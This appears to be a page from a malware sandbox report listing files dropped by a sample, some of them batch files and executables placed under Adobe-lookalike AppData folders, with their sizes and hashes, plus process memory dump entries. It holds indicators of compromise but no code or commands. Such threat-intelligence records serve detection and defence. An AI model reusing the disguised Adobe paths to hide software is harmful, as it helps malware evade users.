4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat

Filesize
139B

MD5
89412aba215b6cd18b8a64c4485fa03f

SHA1
37089346499f54a7d89262a67d95c8764ab3ca1f

SHA256
9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1

SHA512
7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe

Filesize
2.4MB

MD5
9acfede263e82a5d2c3e433f65a034a9

SHA1
8eac20b714691232eebb777fd1b99d456201551a

SHA256
7705dcf5bc1484a398aab305e71e56ab9683f28b2c8e00c556bdefa21c25b15d

SHA512
5b61b43bd15fe2d53c9cb48e00d3d340e5866b349b686e1de813b01ec541bc7716105b0267a31c8d3b260cfc0b4d2e8896acdaba83b6bf7b5bfe11673a2bf3f1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe

Filesize
2.4MB

MD5
9091783550da66165530d1c5c90c1043

SHA1
5e1831a2fd9eaf331dec4895016ab5c1ebbd9443

SHA256
2bd538ee374c558e75d3e10f2051c42bde134ee7fe9539980ad7ab1147f9083e

SHA512
c0d6e54f6a4e8e2e9213ffe38582b86eb7abc83047d4f64b03c75aaadcc289a9bbc1ec1c0d3d10751053f6096039b2206c6e385465903695a68f0ae6fc6a55d4

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat

Filesize
1KB

MD5
ce7ccd3b48dbe8f34db3b2b1222e4fd9

SHA1
e25f9947c2b250c98dffd7bfeaca75b4db17dcfd

SHA256
6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e

SHA512
ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011

Filesize
2KB

MD5
e682489861311d7a3b12b0d35277228a

SHA1
1a5df66e396baf79b774bf77ca3b2e1031265b5d

SHA256
d80049f614db418114857762291924ef7dc627991f13373bfbad42b37e78bec4

SHA512
efad32f3717a31ad26516b04f63ce73d1b6b86fdfedc402ddd436603fba4482c41643f9933a412f461328c044e8e0bc45aa5836e69766b8e97d059c6db1cef4e

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112

Filesize
400B

MD5
3c305699054489d4ba953729549294b8

SHA1
272b920622013b83dc073c26b75f5968663496c5

SHA256
52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8

SHA512
7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b

Download Submit
memory/904-70-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/904-63-0x0000000002AD0000-0x0000000002CDC000-memory.dmp

Filesize
2.0MB

Download
memory/904-73-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/904-74-0x0000000002AD0000-0x0000000002CDC000-memory.dmp

Filesize
2.0MB

Download
memory/904-80-0x0000000002AD0000-0x0000000002CDC000-memory.dmp

Filesize
2.0MB

Download
memory/904-85-0x0000000002AD0000-0x0000000002CDC000-memory.dmp

Filesize
2.0MB

Download
memory/904-58-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/904-59-0x0000000002AD0000-0x0000000002CDC000-memory.dmp

Filesize
2.0MB

Download
memory/904-71-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/904-72-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2040-120-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/2040-90-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4032-86-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/4032-53-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/4504-94-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4504-109-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4504-111-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4504-113-0x0000000002A50000-0x0000000002C5C000-memory.dmp

Filesize
2.0MB

Download
memory/4504-112-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4504-110-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/4504-119-0x0000000002A50000-0x0000000002C5C000-memory.dmp

Filesize
2.0MB

Download
memory/4504-100-0x0000000002A50000-0x0000000002C5C000-memory.dmp

Filesize
2.0MB

Download
memory/4504-96-0x0000000002A50000-0x0000000002C5C000-memory.dmp

Filesize
2.0MB

Download